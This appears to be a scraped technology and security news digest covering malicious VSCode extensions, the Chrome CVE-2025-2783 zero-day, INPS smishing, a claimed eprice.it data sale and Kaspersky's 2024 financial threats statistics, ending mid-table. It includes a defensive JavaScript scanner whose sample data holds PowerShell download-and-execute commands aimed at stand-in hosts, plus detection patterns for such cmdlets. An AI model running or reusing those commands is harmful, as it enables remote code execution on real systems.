— The UK regulator Ofcom outlined what companies must now do after a deadline passed for firms to conduct illegal harms risk assessments. More here.
— Small AI language models offer a cheap option for indigenous communities to take advantage of this emerging technology, argue Brooke Tanner and Cameron Kerry for the Brookings Institution.
Build Customized Raspberry Pi OS Images With rpi-image-gen
Recently Raspberry Pi publicly announced the release of their new rpi-image-gen tool, which is advertised as making custom Raspberry Pi OS (i.e. Debian for specific Broadcom SoCs) images in a much more streamlined fashion than with the existing rpi-gen tool, or with third-party solutions. The general idea seems to be that the user fetches the tool from the GitHub project page, before running the build.sh script with parameters defining the configuration file and other options.
The main advantage of this tool is said to be that it uses binary packages rather than (cross-)compiling, while providing a range of profiles and configuration layers to target specific hardware & requirements. Two examples are provided in the GitHub project, one for a ‘slim’ project, the other for a ‘webkiosk‘ configuration that runs a browser in a restricted (Cage) environment, with required packages installed in the final image.
Looking at the basic ‘slim’ example, it defines the INI-style configuration in config/pi5-slim.cfg, but even when browsing through the main README it’s still somewhat obtuse. Under device it references the mypi5 subfolder which contains its own shell script, plus a cmdline.txt and fstab file. Under image it references the compact subfolder with another bunch of files in it. Although this will no doubt make a lot more sense after taking a few days to prod & poke at this, it’s clear that this is not a tool for casual users who just want to quickly put a custom image together.
This is also reflected in the Raspberry Pi blog post, which strongly insinuates that this is targeting commercial & industrial customers, rather than hobbyists.
VSCode Marketplace Distributed Ransomware! Malicious Extensions Discovered
Two malicious extensions that concealed ransomware have been discovered in the VSCode Marketplace. One of them appeared in the Microsoft store in October of last year but went unnoticed for a long time.
The extensions are ahban.shiba and ahban.cychelloworld, both of which have since been removed from the store. The ahban.cychelloworld extension was uploaded to the store on October 27, 2024, and ahban.shiba on February 17, 2025, bypassing all security checks.
The malware was identified by researchers at ReversingLabs, who wrote that both extensions contained a PowerShell command that downloaded and executed another PowerShell script from a remote Amazon AWS server. That script was responsible for deploying the ransomware.
According to the researchers, the ransomware is clearly still in development or testing, since at present it encrypts only the files in the C:\users\%username%\Desktop\testShiba folder and leaves everything else untouched.
Once encryption is complete, the script displays a notice on screen: “Your files have been encrypted. To recover them, pay 1 ShibaCoin to ShibaWallet.” Unlike classic ransomware attacks, there are no further instructions or other demands.
After the ReversingLabs researchers informed Microsoft about the ransomware, the company quickly removed both extensions from the VSCode Marketplace.
Itay Kruk, a security researcher at ExtensionTotal, who had previously run an automated scan, had detected these malicious extensions in the VSCode Marketplace, but he had not been able to reach the company’s representatives.
Kruk explains that ahban.cychelloworld was not originally malicious and that the ransomware appeared with version 0.0.2, which was accepted into the VSCode Marketplace on November 24, 2024. After that, the ahban.cychelloworld extension received five more updates, all of which contained malicious code.
“We reported ahban.cychelloworld to Microsoft on November 25, 2024, through an automated report generated by our scanner. Perhaps because of the small number of installations of this extension, Microsoft did not prioritize the message,” the expert said.
The experts noted that both extensions downloaded and executed remote PowerShell scripts yet managed to go undetected for several months, which clearly points to serious gaps in Microsoft’s review processes.
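The behaviour described above (an extension that shells out to PowerShell to fetch and run a remote script, first introduced in version 0.0.2) is the kind of change a static check over each published release can surface. The following is an added example, not code from ReversingLabs, ExtensionTotal or the original article: a heuristic JavaScript scanner run over a constructed release history, in which the sample sources, the example.invalid URLs and all function names are assumptions.

```javascript
// Heuristic triage of VS Code extension sources (added example, constructed data).
// It finds string literals that invoke PowerShell and classifies what they do.
// A regex-based literal extractor is an approximation; a production tool
// would walk a real JavaScript AST instead.

const POWERSHELL = /\b(?:powershell|pwsh)(?:\.exe)?\b/i;
// Cmdlets, aliases and .NET calls that pull content from a remote host.
const FETCH = /\b(?:Invoke-WebRequest|Invoke-RestMethod|iwr|irm|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)\b/i;
// Constructs that execute text as code.
const EXEC = /\b(?:Invoke-Expression|iex)\b|\[scriptblock\]::Create/i;
// -EncodedCommand and its common abbreviations, followed by a base64 blob.
const ENCODED = /\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+\/=]{16,})/i;
const URL_RE = /https?:\/\/[^\s'"`)|;]+/gi;
const LITERAL = /(["'`])((?:\\[\s\S]|(?!\1)[^\\])*)\1/g;

// PowerShell expects -EncodedCommand as base64 over UTF-16LE text.
function decodeEncodedCommand(command) {
  const m = ENCODED.exec(command);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : "";
}

function scanSource(source) {
  // Merge literals split with "+" so 'power' + 'shell' is seen as one string.
  const merged = source.replace(/(["'`])\s*\+\s*\1/g, "");
  const findings = [];
  for (const match of merged.matchAll(LITERAL)) {
    const literal = match[2];
    if (!POWERSHELL.test(literal)) continue;
    const decoded = decodeEncodedCommand(literal);
    const text = literal + "\n" + decoded; // inspect both visible and decoded forms
    const fetches = FETCH.test(text);
    const executes = EXEC.test(text);
    findings.push({
      verdict: fetches && executes ? "download-and-execute"
             : fetches ? "remote-fetch"
             : "powershell-spawn",
      encoded: decoded !== "",
      urls: text.match(URL_RE) || [],
    });
  }
  return findings;
}

// files: { "relative/path.js": "source text", ... }
function scanExtension(files) {
  return Object.entries(files).flatMap(([file, source]) =>
    scanSource(source).map((finding) => ({ file, ...finding })));
}

// history: releases in publication order. Returns the first release that
// contains a download-and-execute PowerShell command, or null.
function firstFlaggedVersion(history) {
  for (const release of history) {
    const hits = scanExtension(release.files)
      .filter((f) => f.verdict === "download-and-execute");
    if (hits.length > 0) return { version: release.version, hits };
  }
  return null;
}

// ---- Constructed sample data (not taken from the real extensions) ----
const SAMPLE_ENCODED = Buffer
  .from("Invoke-RestMethod https://cdn.example.invalid/stage2.ps1 | Invoke-Expression", "utf16le")
  .toString("base64");

const SAMPLE_HISTORY = [
  { version: "0.0.1", files: { "extension.js":
      "const vscode = require('vscode');\n" +
      "vscode.window.showInformationMessage('Hello World');\n" } },
  { version: "0.0.2", files: { "extension.js":
      "const cp = require('child_process');\n" +
      "cp.exec('powershell -NoProfile -Command \"Invoke-WebRequest " +
      "https://cdn.example.invalid/stage.ps1 | Invoke-Expression\"');\n" } },
  { version: "0.0.3", files: { "extension.js":
      "const cp = require('child_process');\n" +
      "cp.exec('powershell -NoProfile -enc " + SAMPLE_ENCODED + "');\n" } },
];

const firstBad = firstFlaggedVersion(SAMPLE_HISTORY);
console.log(firstBad ? `first flagged release: ${firstBad.version}` : "clean");
```

A hit is a reason to review the release by hand, not a verdict: legitimate extensions also spawn PowerShell, which is why a plain spawn is reported separately from a download-and-execute finding.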
dk9x23 - Arming ourselves: why, and for whom?
We are spending 800 billion to rearm Europe?
Fine. Against whom, and to do what?
And then... are we sure it is needed? (Spoiler: NO)
spreaker.com/episode/dk9x23-ar…
Admit it. You Want This Go-Kart
Many of us could have been lucky enough to have some form of pedal go-kart in our formative years, and among such lucky children there can have been few who did not wish for their ride to have a little power. Zipping around the neighborhood remained a strenuous affair though, particularly for anyone whose hometown was on a hill. What a shame we didn’t have [Matto Godoy] as a dad then, because he has taken a child’s go-kart and turned it into the electrically-propelled ride of dreams.
Out come the pedals and in goes a wooden floor panel, and at the rear the axle is replaced by a set of hoverboard motors and associated batteries and controllers. The wheels are off-the-shelf wheelbarrow parts, and the 36 V lithium-polymer gives it plenty of go. It looks too small for us, but yes! We want one.
If you want one too, you could do worse than considering a Hacky Racer. And if more motor power is your thing, raid the auto recyclers!
Serious Zero-Day Found in Chrome! State-Sponsored Hackers Are Exploiting This Critical Flaw
Google recently released an urgent bug fix for a new vulnerability tracked as CVE-2025-2783. It is a serious security flaw in the Chrome browser that has been exploited in active attacks.
The attack was delivered through phishing emails that targeted media outlets, educational institutions and government organizations in Russia. In addition, the CVE-2025-2783 exploit is designed to run together with an additional exploit that enables remote code execution.
“Google is aware of reports that an exploit for CVE-2025-2783 exists in the wild,” Google stated in a technical advisory accompanying the fix. Google did not disclose further technical details about the nature of the attacks. The fix was included in Chrome version 134.0.6998.177/.178 for Windows.
The vulnerability is attributed to Mojo, a name that refers to a collection of runtime libraries providing a platform-independent mechanism for inter-process communication (IPC).
Mojo application diagram
“In all cases, infection occurred immediately after the victim clicked on a link in a phishing email, and the attackers’ website was opened using the Google Chrome web browser,” the researchers said. “No further action was required to become infected. The essence of the vulnerability comes down to a logical error at the intersection of Chrome and the Windows operating system, which allows the browser’s sandbox protection to be bypassed.”
“All the attack artifacts analyzed so far indicate high sophistication of the attackers, allowing us to confidently conclude that a state-sponsored APT group is behind this attack,” the researchers said.
CVE-2025-2783 is the first actively exploited Chrome zero-day since the start of the year. Kaspersky researchers Boris Larin and Igor Kuznetsov were credited with discovering and reporting the flaw on March 20, 2025.
The Russian cybersecurity vendor, in its own bulletin, characterized the zero-day exploitation of CVE-2025-2783 as a technically sophisticated targeted attack, indicative of an advanced persistent threat (APT). It is tracking the activity under the name Operation ForumTroll.
The short-lived links are said to have been personalized for the targets, with espionage as the campaign’s ultimate goal. The malicious emails, Kaspersky said, contained invitations purportedly from the organizers of a legitimate scientific and expert forum, Primakov Readings.
Designing a Portable Mac Mini
When Apple first launched the Macintosh, it created a new sort of “Lunchbox” form factor that was relatively portable and very, very cool. Reminiscent of that is this neat portable Macintosh Mini, created by [Scott Yu-Jan].
[Scott] has created something along these lines before—putting an iPad dock on top of a Macintosh Studio to create a look vaguely reminiscent of the very first Macintosh computers. However, that build wasn’t portable—it wasn’t practical to build such a thing around the Macintosh Studio. In contrast, the Mac Mini is a lithe, lightweight thing that barely sups power—it’s much more suitable for a “luggable” computer.
The build relies on a 3D printed enclosure that wraps around the Mac Mini like a glove. Inside, there’s a chunky 20,800 mAh power bank with enough juice to run the computer for over three hours. Just like the original Mac, there’s a handle on top, too. The build’s main screen is actually an iPad Mini, hooked up to the Mac Mini. If you want to use it separately, it can be popped out just by pushing it via a cutout in the bottom of the enclosure.
[Scott] notes that it’s cool, but not exactly practical—it weighs seven pounds, mostly due to the weight of the heavy power bank. We’ve featured [Scott’s] stylish builds before, too, like this nice iPhone dock.
youtube.com/embed/IXWmrXt52wM?…
Physical Key Copying Starts With a Flipper Zero
A moment’s inattention is all it takes to gather the information needed to make a physical copy of a key. It’s not necessarily an easy process, though, so if pen testing is your game, something like this Flipper Zero key copying toolchain can make the process quicker and easier when the opportunity presents itself.
Of course, we’re not advocating for anything illegal here; this is just another tool for your lock-sports bag of tricks. And yes, there are plenty of other ways to accomplish this, but using a Flipper Zero to attack a strictly mechanical lock is kind of neat. The toolchain posted by [No-Lock216] starts with an app called KeyCopier, which draws a virtual key blank on the Flipper Zero screen. The app allows you to move the baseline for each pin to the proper depth, quickly recording the bitting for the key. Later, the bitting can be entered into an online app called keygen which, along with information on the brand of lock and its warding, can produce an STL file suitable for downloading and printing.
Again, there are a ton of ways to make a copy of a key if you have physical access to it, and the comments of the original Reddit post were filled with suggestions amusingly missing the entire point of this. Yes, you can get a key cut at any hardware store for a buck or two that will obviously last a lot longer than a 3D-printed copy. But if you only have a few seconds to gather the data from the key, an app like KeyCopier could be really convenient. Personally, we’d find a smartphone app handier, but if you’ve got a Flipper, why not leverage it?
Thanks to [JohnU] for the tip.
Brazilian Modders Upgrade NVidia Geforce GTX 970 to 8 GB of VRAM
Although NVidia’s current disastrous RTX 50-series is getting all the attention right now, this wasn’t the first misstep by NVidia. Back in 2014 when NVidia released the GTX 970 users were quickly dismayed to find that their ‘4 GB VRAM’ GPU had actually just 3.5 GB, with the remaining 512 MB being used in a much slower way at just 1/7th of the normal speed. Back then NVidia was subject to a $30/card settlement with disgruntled customers, but there’s a way to at least partially fix these GPUs, as demonstrated by a group of Brazilian modders (original video with horrid English auto-dub).
The mod itself is quite straightforward, with the original 512 MB, 7 Gbps GDDR5 memory modules replaced with 1 GB, 8 Gbps chips and adding a resistor on the PCB to make the GPU recognize the higher density VRAM ICs. Although this doesn’t fix the fundamental split VRAM issue of the ASIC, it does give it access to 7 GB of faster, higher-density VRAM. In benchmarks performance was massively increased, with Unigine Superposition showing nearly a doubling in the score.
In addition to giving this GTX 970 a new lease on life, it also shows just how important having more VRAM on a GPU is, which is ironic in this era where somehow GPU manufacturers deem 8 GB of VRAM to be acceptable in 2025.
youtube.com/embed/JR5mm96Dj7k?…
Operation ForumTroll: APT attack with Google Chrome zero-day exploit chain
In mid-March 2025, Kaspersky technologies detected a wave of infections by previously unknown and highly sophisticated malware. In all cases, infection occurred immediately after the victim clicked on a link in a phishing email, and the attackers’ website was opened using the Google Chrome web browser. No further action was required to become infected.
All malicious links were personalized and had a very short lifespan. However, Kaspersky’s exploit detection and protection technologies successfully identified the zero-day exploit that was used to escape Google Chrome’s sandbox. We quickly analyzed the exploit code, reverse-engineered its logic, and confirmed that it was based on a zero-day vulnerability affecting the latest version of Google Chrome. We then reported the vulnerability to the Google security team. Our detailed report enabled the developers to quickly address the issue, and on March 25, 2025, Google released an update fixing the vulnerability and thanked us for discovering this attack.
Acknowledgement for finding CVE-2025-2783 (excerpt from security fixes included into Chrome 134.0.6998.177/.178)
We have discovered and reported dozens of zero-day exploits actively used in attacks, but this particular exploit is certainly one of the most interesting we’ve encountered. The vulnerability CVE-2025-2783 really left us scratching our heads, as, without doing anything obviously malicious or forbidden, it allowed the attackers to bypass Google Chrome’s sandbox protection as if it didn’t even exist. The cause of this was a logical error at the intersection of Google Chrome’s sandbox and the Windows operating system. We plan to publish the technical details of this vulnerability once the majority of users have installed the updated version of the browser that fixes it.
Our research is still ongoing, but judging by the functionality of the sophisticated malware used in the attack, it seems the attackers’ goal was espionage. The malicious emails contained invitations supposedly from the organizers of a scientific and expert forum, “Primakov Readings”, targeting media outlets, educational institutions and government organizations in Russia. Based on the content of the emails, we dubbed the campaign Operation ForumTroll.
Example of a malicious email used in this campaign (translated from Russian)
At the time of writing, there’s no exploit active at the malicious link – it just redirects visitors to the official website of “Primakov Readings”. However, we strongly advise against clicking on any potentially malicious links.
The exploit we discovered was designed to run in conjunction with an additional exploit that enables remote code execution. Unfortunately, we were unable to obtain this second exploit, as in this particular case it would have required waiting for a new wave of attacks and exposing users to the risk of infection. Fortunately, patching the vulnerability used to escape the sandbox effectively blocks the entire attack chain.
All the attack artifacts analyzed so far indicate high sophistication of the attackers, allowing us to confidently conclude that a state-sponsored APT group is behind this attack.
We plan to publish a detailed report with technical details about the zero-day exploit, the sophisticated malware, and the attackers’ techniques.
Kaspersky products detect the exploits and malware used in this attack with the following verdicts:
- Exploit.Win32.Generic
- Trojan.Win64.Agent
- Trojan.Win64.Convagent.gen
- PDM:Exploit.Win32.Generic
- PDM:Trojan.Win32.Generic
- UDS:DangerousObject.Multi.Generic
Indicators of Compromise
LED Filaments Become Attractive Time Piece
There are a million ways to use LEDs to make a clock. [sjm4306] chose to go a relatively conventional route, making something that approximates a traditional analog timepiece. However, he did it using LED filaments to create a striking and unique design. Thus the name—FilamenTIME!
LED filaments are still relatively new on the scene. They’re basically a bunch of tiny LEDs mounted in a single package to create a single “filament” of light that appears continuous. It’s great if you want to create a bar of light without messing around with populating tons of parts and having to figure out diffusion on your own.
[sjm4306] used them to create glowing bar elements in a clock for telling the time. The outer ring contains 60 filaments for the 60 minutes in an hour, while the inner ring contains 12 filaments to denote the hours themselves. To handle so many LEDs, there are 9 shift registers on board. They’re driven by an ATmega328P which runs the show, with a DS3232MZ real-time clock onboard for keeping time. As you might imagine, creating such a large circular clock required a large PCB—roughly a square foot in size. It doesn’t come cheap, though [sjm4306] was lucky enough to have sponsorship to cover the build. [sjm4306] is still working on the firmware, and hopes to build a smaller, more compact version, which should cut costs compared to the large single board.
It’s a neat clock, and we’d know, having seen many a timepiece around these parts. Video after the break.
The Vectrex Home Computer You Never Had
The Vectrex console from the early 1980s holds a special place in retrocomputing lore thanks to its vector display — uniquely for a home system, it painted its graphics to the screen by drawing them with an electron beam, instead of scanning across a raster as a TV screen would. It thus came with its own CRT, and a distinctive vertical screen form factor.
For all that though, it was just a games console, but there were rumors that it might have become more. [Intric8] embarked on a quest to find some evidence, and eventually turned up what little remains in a copy of Electronic Games magazine. A keyboard, RAM and ROM expansion, and a wafer drive were in the works, which would have made the Vectrex a quirky equal of most of what the likes of Commodore and Sinclair had to offer.
It’s annoying that it doesn’t specify which issue of the magazine has the piece, and after a bit of browsing archive.org we’re sorry to say we can’t find it ourselves. But the piece itself bears a second look, for what it tells us about the febrile world of the 8-bit games industry. This was a time of intense competition in the period around the great console crash, and developers would claim anything to secure a few column inches in a magazine. It’s not to say that the people behind the Vectrex wouldn’t have produced a home computer add-on for it if they could have done, but we remember as teenagers being suckered in by too many of these stories. We still kinda want one, but we’d be surprised if any ever existed.
If you have a Vectrex, it’s possible to give it a light pen.
Ancient Pocket Computer Gets a Serious Serial Upgrade
[Robert’s Retro] is one of those great YouTube channels that shows us the ins and outs of old and obscure computers. [Robert] likes going a step beyond the traditional teardown though, repairing and upgrading these old machines. His latest project involves giving the ZEOS Pocket PC a fully-functional serial port.
If you’re unfamiliar with the ZEOS Pocket PC, you might know it as the Tidalwave PS-1000—it’s a pretty straightforward clone. Originally, these machines could be had with a proprietary serial adapter to enable them to interface with external peripherals. However, like most obscure cables and connectors from three decades ago, they’re virtually unobtainable today.
To solve this problem, [Robert] decided to hack in a traditional DE-9 connector instead. Commonly referred to as the DB-9, this is the most common serial port design used on IBM PCs and compatibles. Getting the larger port into the compact PC required some careful hacking of the case, as well as delicate soldering to hook up the pins to the right signals on the tightly-packed motherboard. This video does involve cutting some vintage plastic, but overall it’s a very neat mod that is handled with due respect and care.
This isn’t the first time we’ve seen him upgrade a classic portable computer, either.
2024 Hackaday Supercon Talk: Killing Mosquitoes with Freaking Drones, and Sonar
Suppose that you want to get rid of a whole lot of mosquitoes with a quadcopter drone by chopping them up in the rotor blades. If you had really good eyesight and pretty amazing piloting skills, you could maybe fly the drone yourself, but honestly this looks like it should be automated. [Alex Toussaint] took us on a tour of how far he has gotten toward that goal in his amazingly broad-ranging 2024 Superconference talk. (Embedded below.)
The end result is an amazing 380-element phased sonar array that allows him to detect the location of mosquitoes in mid-air, identifying them by their particular micro-doppler return signature. It’s an amazing gadget called LeSonar2, that he has open-sourced, and that doubtless has many other applications at the tweak of an algorithm.
Rolling back in time a little bit, the talk starts off with [Alex]’s thoughts about self-guiding drones in general. For obstacle avoidance, you might think of using a camera, but they can be heavy and require a lot of expensive computation. [Alex] favored ultrasonic range finding. But then an array of ultrasonic range finders could locate smaller objects and more precisely than the single ranger that you probably have in mind. This got [Alex] into beamforming and he built an early prototype, which we’ve actually covered in the past. If you’re into this sort of thing, the talk contains a very nice description of the necessary DSP.
[Alex]’s big breakthrough, though, came with shrinking down the ultrasonic receivers. The angular resolution that you can resolve with a beam-forming array is limited by the distance between the microphone elements, and traditional ultrasonic devices like we use in cars are kinda bulky. So here comes a hack: the TDK T3902 MEMS microphones work just fine up into the ultrasound range, even though they’re designed for human hearing. Combining 380 of these in a very tightly packed array, and pushing all of their parallel data into an FPGA for computation, led to the LeSonar2. Bigger transducers put out ultrasound pulses, the FPGA does some very intense filtering and combining of the output of each microphone, and the resulting 3D range data is sent out over USB.
After a marvelous demo of the device, we get to the end-game application: finding and identifying mosquitoes in mid-air. If you don’t want to kill flies, wasps, bees, or other useful pollinators while eradicating the tiny little bloodsuckers that are the drone’s target, you need to be able to not only locate bugs, but discriminate mosquitoes from the others.
For this, he uses the micro-doppler signatures that the different wing beats of the various insects put out. Wasps have a very wide-band doppler echo – their relatively long and thin wings are moving slower at the roots than at the tips. Flies, on the other hand, have stubbier wings, and emit a tighter echo signal. The mosquito signal is even tighter.
If you had told us that you could use sonar to detect mosquitoes at a distance of a few meters, much less locate them and differentiate them from their other insect brethren, we would have thought that it was impossible. But [Alex] and his team are building these devices, and you can even build one yourself if you want. So watch the talk, learn about phased arrays, and start daydreaming about what you would use something like this for.
INPS-Themed Scam! Is Your ID Document for Sale on the Dark Web? Always Stay Vigilant and Alert!
CERT-AgID has repeatedly reported INPS-themed smishing activity that continues to hit Italy. The goal, as already noted, is the theft of copies of identity documents, with particular interest in selfies in which the document is shown next to the victim’s face.
In addition to reviewing the daily reports from public administrations (with INPS on the front line) and from citizens who report ongoing suspicious activity to us, CERT-AGID has set up constant, dedicated monitoring of the phenomenon, starting takedown procedures (when possible) to ask registrars for the immediate removal of the identified domains and sharing the indicators of compromise (IoCs) detected with accredited public bodies.
Despite the joint efforts with the responsible bodies, the campaigns show no sign of abating and the number of victims keeps growing.
As shown in the following chart, over the last five years fraudulent activity has intensified significantly and, in the first three months of 2025 alone, 33 fake INPS domains were identified, created specifically to steal identity documents from victims.
The stolen data can be used for various illicit activities, mainly digital identity theft (SPID) or the sale of the documents on the dark web.
Regarding the latter, CERT-AGID has detected the online sale of Italian citizens’ documents, complete with selfies, on a well-known deep web forum.
The listing explicitly describes the contents of the package for sale: identity documents with selfies and front-and-back copies of the documents.
As supporting evidence, three links are provided to images showing Italian citizens holding their identity document next to their face. This corresponds exactly to the document requests made by the fake sites that pose as the INPS site and promise a non-existent refund.
To raise awareness of the issue and answer the many questions we receive every day, CERT-AGID has produced a dedicated guide that explains in detail how to recognize the signs of the scam and what to do if you are a victim of this kind of fraud.
So when you are faced with something suspicious: stop, breathe and try to understand what has happened… As always, be careful, be vigilant and remember: the most dangerous deception is the one you do not expect.
ReactOS 0.4.15 Released With Major Improvements
Recently the ReactOS project released the much anticipated 0.4.15 update, making it the first major release since 2020. Despite what might seem like a minor version bump from the previous 0.4.14 release, the update introduces sweeping changes to everything from the kernel to the user interface and aspects like the audio system and driver support. Those who have used the nightly builds over the past years will likely have noticed a lot of these changes already.
Japanese input with MZ-IME and CJK font (Credit: ReactOS project)
A notable change is to plug-and-play support which enables more third party drivers and booting from USB storage devices. The Microsoft FAT filesystem driver from the Windows Driver Kit can now be used courtesy of better compatibility, there is now registry healing, and caching and kernel access checks are implemented. The latter improvement means that many ReactOS modules can now work in Windows too.
On the UI side there is a much improved IME (input method editor) feature, along with native ZIP archive support and various graphical tweaks.
Meanwhile since 0.4.15 branched off the master branch six months ago, the latter has seen even more features added, including SMP improvements, UEFI support, a new NTFS driver and improvements to power management and application support. All of this accompanied by many bug fixes, which makes it totally worth it to regularly check out the nightly builds.
A Threat Actor Claims a Cyberattack on Italian Retailer Eprice. Possible Sale of Data from 2008
Yesterday, on the well-known dark web forum BreachForum, a user going by the pseudonym Alcxtraze claimed to have stolen a database from the well-known Italian e-commerce site eprice.it. According to what is reported on the underground forum, the volume of exfiltrated data appears to be very significant: about 6.8 million records.
Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is intended exclusively for threat intelligence and for raising awareness of cybersecurity risks. Red Hot Cyber condemns any unauthorized access, improper dissemination or unlawful use of such data. At present, it is not possible to independently verify the authenticity of the information reported, because the organization involved has not yet released an official statement on its website. Consequently, this article should be considered for informational and intelligence purposes only.
From an analysis of the post published on the underground forum, looking at the samples “offered” by the cybercriminal, it appears to be a database containing the orders placed on the site.
The data, at least that present in the samples, appears rather dated (editor’s note: the dates go back to 2008), which leads us to hypothesize that the exfiltrated data is also very old. No sensitive information such as payment details or credit card numbers appears to be present, nor access credentials (login and password). However, customers’ personal data is visible in clear text, including the addresses used for shipping orders.
The sale price has not been set: the author of the post invites interested parties to make an offer. It is also specified that the database will be sold to a single buyer. It is not possible to establish with certainty whether the user who put the database up for sale is also the threat actor responsible for the attack and the exfiltration. What is certain is that Alcxtraze enjoys an excellent reputation on BreachForum and, in recent hours, has put up for sale several databases relating to other, foreign sites.
As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving prominence to the issue.
RHC will monitor how the matter develops in order to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email: redhotcyber.com/whistleblower.
Financial cyberthreats in 2024
As more and more financial transactions are conducted in digital form each year, financial threats comprise a large piece of the global cyberthreat landscape. That’s why Kaspersky researchers analyze the trends related to these threats and share an annual report highlighting the main dangers to corporate and consumer finances. This report contains key trends and statistics on financial phishing and on mobile and PC banking malware, and offers actionable recommendations to bolster security measures and effectively mitigate emerging threats.
Methodology
In this report, we present an analysis of financial cyberthreats in 2024, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN). Note that for mobile banking malware, we retrospectively revised the 2023 numbers to provide more accurate statistics. We also changed the methodology for PC banking malware by removing obsolete families that no longer use Trojan banker functionality, hence the sharp drop in numbers against 2023.
Key findings
Phishing
- Banks were the most popular lure in 2024, accounting for 42.58% of financial phishing attempts.
- Amazon Online Shopping was mimicked by 33.19% of all phishing and scam pages targeting online store users in 2024.
- Cryptocurrency phishing saw an 83.37% year-over-year increase in 2024, with 10.7 million detections compared to 5.84 million in 2023.
PC malware
- The number of users affected by financial malware for PCs dropped from 312,000 in 2023 to 199,000 in 2024.
- ClipBanker, Grandoreiro and CliptoShuffler were the prevalent malware families, together targeting over 89% of affected users.
- Consumers remained the primary target of financial cyberthreats, accounting for 73.69% of attacks.
Mobile malware
- Nearly 248,000 users encountered mobile banking malware in 2024 – almost 3.6 times more than in 2023 when 69,000 users were affected.
- Mamont was the most active Android malware family, accounting for 36.7% of all mobile banker attacks.
- Users in Turkey were the most targeted.
Financial phishing
In 2024, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.
We analyzed phishing detections separately for users of our home and business products. Pages mimicking web services accounted for the largest slice of the business pie at 26.56%. The percentage was lower for home users (10.34%), but home users were more likely to be targeted by pages using banks and global internet portals, social media and IMs, payment systems, and online games as a lure. Delivery company scams accounted for 15.17% of attacks targeting businesses, but did not register in the top ten for home users.
TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users’ devices, 2024
TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2024
Overall, among the three major financial phishing categories, bank users were targeted most in 2024 (42.58%), rising a little over 4 p.p. on the previous year. Online stores were of relatively less interest to the fraudsters at 38.15%, dropping from 41.65% in 2023. Payment systems accounted for the remaining 19.27%.
Distribution of financial phishing pages by category, 2024
Online shopping scams
The most popular online brand target for fraudsters was Amazon (33.19%). This should not come as a surprise given Amazon is one of the world’s largest online retailers. With 2.41 billion average monthly visitors and $447.5 billion in annual web sales, up 8.6% in 2024, there is every chance Amazon will retain its dubious honor into 2025.
Apple’s share of attacks dropped nearly 3 p.p. from last year’s figure to 15.68%, while Netflix scams grew slightly to 15.99%. Meanwhile, fraudsters’ interest in Alibaba increased, its share going up from 3.17% in 2023 to 7.95% in 2024.
Examples of phishing sites that mimic Amazon, Netflix, Apple and Alibaba
Last year, Louis Vuitton accounted for a whopping 5.52% of all attacks. However, the luxury brand completely slipped out of the top ten in 2024, along with Italian eyewear company Luxottica. Instead, sportswear giant Adidas and Russian e-commerce platform Ozon entered the list with 1.39% and 2.75% respectively. eBay (4.35%), Shopify (3.82%), Spotify (2.84%) and Mercado Libre (1.86%) all stayed in the top ten, with marginal differences from the previous year.
TOP 10 online shopping brands mimicked by phishing and scam pages, 2024
When looking at fake website content, free prizes and offers that were a little too good to be true once again proved a popular tactic used by scammers. However tempting they may be, most likely, the victim will be the one who pays. Often scammers require “commissions” to get the prize or ask the user to pay for delivery. After receiving the money, they disappear.
Examples of scam pages offering free prizes
In other cases, phishers use valuable gifts to trick the user into giving out their credentials. The scheme below offers the victim an Amazon gift card; to obtain it, they must enter an OTP code on a phishing website. Although such codes are temporary, the scammers may use them to log in to the victim’s account or perform a fraudulent transaction as soon as the code is entered into the fake form.
A phishing scheme aimed at getting OTP codes
Fraudsters often trick users into “verifying” their accounts by sending fake security alerts or urgent messages claiming suspicious activity. Victims are directed to a counterfeit page resembling platforms like eBay, where entering data (for example, credentials, payment data or documents) hands them over to scammers.
An example of a phishing site that mimics eBay
Another common tactic involves creating fake storefronts or seller profiles on marketplaces, listing numerous products at seemingly irresistible prices. Shoppers drawn in by the deals unknowingly provide payment details, only to receive nothing in return.
An example of a scam site that mimics an online marketplace
While many pages mimicking online stores target shoppers, there are others that are designed to collect business account credentials. For example, below you can see a phishing page targeting users registered on the Amazon Brand Registry platform, which provides businesses with a range of brand-building and intellectual property protection tools.
An example of a phishing page targeting Amazon brand accounts
Payment system phishing
Payment systems were mimicked in 19.27% of financial phishing attacks detected and blocked by Kaspersky products in 2024 – almost the same percentage as in 2023. Once again, PayPal was the most targeted, but its share of attacks fell from 54.73% to 37.53%. Attacks targeting Mastercard went in the opposite direction, nearly doubling from 16.58% in 2023 to 30.54%. American Express, Qiwi and Cielo are all new entrants into the top five, replacing Visa, Interac and PayPay.
TOP 5 payment systems mimicked by phishing and scam pages, 2024
Cryptocurrency scams
In 2024, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky anti-phishing technologies prevented 10,706,340 attempts to follow a cryptocurrency-themed phishing link, which was approximately 83.37% higher than the 2023 figure of 5,838,499 (which itself was 16% bigger than the previous year’s). As cryptocurrencies continue to grow, this number is only ever going to get larger.
Financial PC malware
In 2024, the decline in users affected by financial PC malware continued. On the one hand, people continue to rely on mobile devices to manage their finances. On the other hand, some of the most prominent malware families that were initially designed as bankers had not used this functionality for years, so we excluded them from these statistics. As a result, the number of affected users dropped significantly from 312,453 in 2023 to 199,204 in 2024.
Changes in the number of unique users attacked by banking malware in 2024
Key financial malware actors
The notable strains of banking Trojans in 2024 included ClipBanker (62.9%), Grandoreiro (17.1%), CliptoShuffler (9.5%) and BitStealer (1.3%). Most of these Trojans specifically target crypto assets. However, Grandoreiro is a full-fledged banking Trojan that targeted 1700 banks and 276 crypto wallets in 45 countries and territories around the globe in 2024.
| Name | %* |
|---|---|
| ClipBanker | 62.9 |
| Grandoreiro | 17.1 |
